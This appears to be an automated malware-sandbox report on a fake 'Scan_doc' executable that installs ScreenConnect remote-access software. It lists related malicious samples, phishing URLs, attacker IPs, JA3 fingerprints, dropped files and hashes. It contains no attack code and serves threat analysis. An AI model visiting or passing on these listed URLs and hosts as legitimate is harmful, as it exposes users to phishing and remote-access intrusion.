                                                                                                                                                                                                                                VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                tr5jscSEwo.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                cloudfiles-secure.ioScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 188.119.113.59
                                                                                                                                                                                                                                5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 188.119.113.59
                                                                                                                                                                                                                                VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                fp2e7a.wpc.phicdn.netScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_urlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                http://racrodisaver.co.in/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                https://www.elightsailorsbank.uksfholdings.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                                • 192.229.221.95
                                                                                                                                                                                                                                http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 192.229.221.95

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                LVLT-10753USScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                tr5jscSEwo.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eD0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                404.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                jD1RqkyUNm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                ejdc7iP3A7.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                • 178.215.236.119

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    Scan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      E_BILL0041272508.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                        Scan_PDF_5255303072.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                          invoice-benefits-agency9-24-2024.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                            Scan_PDF_2017163298.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                              He6pI1bhcA.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                5eRyCYRR9y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                  VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                    vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                      s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                                        Entropy (8bit):0.8307250465091273
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugi:gJjJGtpTq2yv1AuNZRY3diu8iBVqFY
                                                                                                                                                                                                                                                                        MD5:769DDBBFBF45B0D7EB686FDEF884B189
                                                                                                                                                                                                                                                                        SHA1:054045EA38538583A9C33C2609057851F7975042
                                                                                                                                                                                                                                                                        SHA-256:1F8422ED04923882CA65EF9968985F66B0116A0AF717EDB72505917DB21C1DD8
                                                                                                                                                                                                                                                                        SHA-512:8D6C45428E6A669EE84E18729B0550FD01730CA6934E8527000FA9C63C8119BC8E52D80C3629045346937D34229F135E65E18098EEEEBA0A217A98C473BE6C86
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfcf058cc, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                                        Entropy (8bit):0.6585729606571151
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                                        MD5:95C7D4AE26FC5CD184275A45A5A911F0
                                                                                                                                                                                                                                                                        SHA1:BAF0FD62FC0D504285D8E93AE1AB9F9CF7E6D357
                                                                                                                                                                                                                                                                        SHA-256:8868BEEF3F6F9E483AD8BCDD1611A336E77BDF5FE3F0244A596312CF54239861
                                                                                                                                                                                                                                                                        SHA-512:B69B00B8B3A755E050A866A7E73C1EC2F5943A31C16E759F13CB7E7B22749C737FC4D306F99082409E5C96FE6CB2CAC65604FCBCB4117F0E586E444A72040033
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..X.... ...............X\...;...{......................0.z..........{..2....|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................U.2....|......................2....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                                        Entropy (8bit):0.08101654594557003
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:cKlXKYeg1vktbltGuAJkhvekl1Qxpkt//AllrekGltll/SPj:c+XKzwstbltrxlCxpkt//AJe3l
                                                                                                                                                                                                                                                                        MD5:B9BE815DE71E14455FAD13444B7A914A
                                                                                                                                                                                                                                                                        SHA1:3906D3909B1A122131571CF213BCC1FD67FE9F8A
                                                                                                                                                                                                                                                                        SHA-256:4990461939801BE6F42465381422E82B9D89501BB2388A0DACDCAF5A1BFFA7A5
                                                                                                                                                                                                                                                                        SHA-512:9603A3D0202A1A02B5E6281D43302EABD3116AC55D0442599875511CC26715F82E6531943F7F155675A131679F4152C7D11A2A9A04B7F978333BD83C3961082A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:ul-+.....................................;...{..2....|.......{...............{.......{...XL......{......................2....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Scan_doc_09_16_2_fec9a84a79da4acbbacb686b6265423b65e5331_ff68c4ec_e8d99851-ea41-4aa5-8422-6c4925e08426\Report.wer

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):0.9250034890826702
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:9FMtZ5yYdZP0BU/o6Gji0ozuiFGZ24IO8aO:8YqZ8BU/Qj8zuiFGY4IO87
                                                                                                                                                                                                                                                                        MD5:64F055F80CEBFA4E94E6FAE2E7C39D89
                                                                                                                                                                                                                                                                        SHA1:3B373B28C8B096D32F9A48793487F7F9DFD3C6F2
                                                                                                                                                                                                                                                                        SHA-256:4CFA90A35FF62A147F3AAF75441687574C174945295AA8334442197AD63DCA59
                                                                                                                                                                                                                                                                        SHA-512:7CE8D7129C2413DE2317705A01B690D7BD04DF203AFB4F41C83D01A0A0FA7B4154D38C4050E9BFB03E9157467A0E971220CC842624D405BEBDC7004E1A199A70
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.1.6.5.7.0.5.3.7.5.2.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.1.6.5.7.2.1.1.5.6.6.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.d.9.9.8.5.1.-.e.a.4.1.-.4.a.a.5.-.8.4.2.2.-.6.c.4.9.2.5.e.0.8.4.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.d.6.9.d.d.c.-.2.f.7.3.-.4.6.7.c.-.8.1.a.3.-.b.4.0.9.c.a.b.9.4.3.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.c.a.n._.d.o.c._.0.9._.1.6._.2.4._.1.1.2.0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.4.-.0.0.0.1.-.0.0.1.4.-.f.2.5.9.-.6.4.b.d.8.2.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.e.8.8.e.7.e.c.d.b.7.4.c.5.d.9.e.b.8.0.7.8.c.8.2.d.4.f.f.0.d.0.0.0.0.f.f.f.f.!.0.0.0.0.7.1.6.6.0.3.7.4.a.d.f.6.8.0.a.e.6.6.1.c.6.7.5.d.1.7.2.3.b.d.5.a.b.0.6.c.7.7.a.8.!.S.c.a.n._.d.o.c._.0.9._.1.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER360C.tmp.dmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Wed Oct 2 04:22:50 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):78668
                                                                                                                                                                                                                                                                        Entropy (8bit):1.7273508636791532
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:bUbVqK8mQtbX7GOhI/8rZ/dkgir0tFfhdIo7PemHOufAinrHfsnPr7Inr:GVqK8mQnhI/Rn0DfP9PllYiTirM
                                                                                                                                                                                                                                                                        MD5:B4374F2E682B9A26677DAEC44228D390
                                                                                                                                                                                                                                                                        SHA1:D0A6B63E0B220A475E1639A3A28E1DD676CB8B2F
                                                                                                                                                                                                                                                                        SHA-256:D9EB3D8A0250F17A6885E084136E9B8173DAA314D25581035DC7415DEBFDB40E
                                                                                                                                                                                                                                                                        SHA-512:47744AAAD9CB73CEDF6FB5DFDF4A76FA0B373B6CFF65EBE9769AE755B62E04D37CAC6E1CEEC128F1BB9288EE6C4B9F105B8576BB00D5A9791C1480FE9538D062
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MDMP..a..... ..........f.........................................;..........T.......8...........T............!.............. ...........................................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A81.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8378
                                                                                                                                                                                                                                                                        Entropy (8bit):3.6980279426968585
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJe1646YEIBSUG5y+gmf5thprf89bNPsfELvm:R6lXJ8646YEuSUT+gmf5tsN0fH
                                                                                                                                                                                                                                                                        MD5:ABE24BB211DBC675BA5FC8226C561120
                                                                                                                                                                                                                                                                        SHA1:0C2D816674332B3652100780ADCEBC95F75D3644
                                                                                                                                                                                                                                                                        SHA-256:A3C2A06F0D0C53733F2F3837873B873459AD6EB7F8C3059A7F749250E51D9AE0
                                                                                                                                                                                                                                                                        SHA-512:E6ACF3F8AE6BD47F268ED5C0734611ECAD54FFFD3BB1B98FBA17B15641670892541EEB543F8CAF49C8ED1FF14063E2D249CD8A26D2CB53F474A9DDE4CDBB6CF6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.2.<./.P.i.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AFF.tmp.xml

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4653
                                                                                                                                                                                                                                                                        Entropy (8bit):4.497592489262267
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsAJg77aI9huWpW8VYuYm8M4Jq/bfbwLFyw+q8/bSTYjQeQ0d:uIjfGI7HP7VCJ2bfbfwmbfjQeQ0d
                                                                                                                                                                                                                                                                        MD5:65BAB0A2546394E68724448198A7F06C
                                                                                                                                                                                                                                                                        SHA1:34BDBE91946C950F069F9ED54B129BB6F98C14EC
                                                                                                                                                                                                                                                                        SHA-256:98547A21FE72A41458E989C480016C5181F4C2351DFD77322E8826FF694C7919
                                                                                                                                                                                                                                                                        SHA-512:E486D5B9D3621B6CD2C9FFE001D03A9FFA31B4F9996716F47C5CF4F03DFC2B1ABAE1458D3FB9655B8D4157EADF8A58E52A2CAB385DA2AA9E89B280CA598134A0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525325" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B1D.tmp.csv

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):86990
                                                                                                                                                                                                                                                                        Entropy (8bit):3.089546500052646
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:wcWug0xYMz0frFz45perZ4D9Kf1dJo2Uqd:wcWug0xYMz0frFz45perZ4D9Kf1dJo2j
                                                                                                                                                                                                                                                                        MD5:0F8E5D3C2EFC40BD98CE2E1ED9CEF927
                                                                                                                                                                                                                                                                        SHA1:2C51C308A833A77DDE36AEB9DA2E06F305FE5C0F
                                                                                                                                                                                                                                                                        SHA-256:1074F7D800A8452BEA011041852577D47FF6210B6F33B77F96FB431188162056
                                                                                                                                                                                                                                                                        SHA-512:34FEA4B1B6636CFC4C12CFA35BD778D7C4C87DB63B5C282F7145B44451C75893453426458B6094814B43BD3EE5E0A8C669DC4D6518C0DFBBDAED553002637363
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BBA.tmp.txt

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                                                        Entropy (8bit):2.684181407381494
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:TiZYW9tQjpYRQDYGWLHfYEZHYt8iOLyCXywpmftaVFBgMDexIhS3:2ZDC1EB/SaVFBgMDeuhS3
                                                                                                                                                                                                                                                                        MD5:B5A720F97BB6C1E0143DD9CC62B44959
                                                                                                                                                                                                                                                                        SHA1:ED9E21D4461874384611E4742FCCD46200D480AF
                                                                                                                                                                                                                                                                        SHA-256:12BA3B8A08A4F8D6BD00B3504BA0022217269EA9AEB4D6EB5ACCBF1099940E0E
